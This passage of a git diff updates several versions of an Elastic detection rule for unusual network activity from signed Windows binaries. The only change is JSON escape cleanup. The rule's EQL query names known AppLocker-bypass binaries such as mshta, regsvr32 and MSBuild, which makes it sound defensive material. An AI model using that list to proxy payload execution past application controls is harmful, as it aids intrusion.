status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : 
\"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_106.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_106.json index 7664af93675..7860e11902d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_106.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", - "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : 
\"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_107.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_107.json index 6cafd711b3e..deadd3f4c4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_107.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", - "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : 
\"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_108.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_108.json index 0b9aa5808ac..5a9bc258274 100644 --- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_108.json 
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unusual Network Activity from a Windows System Binary",
- "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - 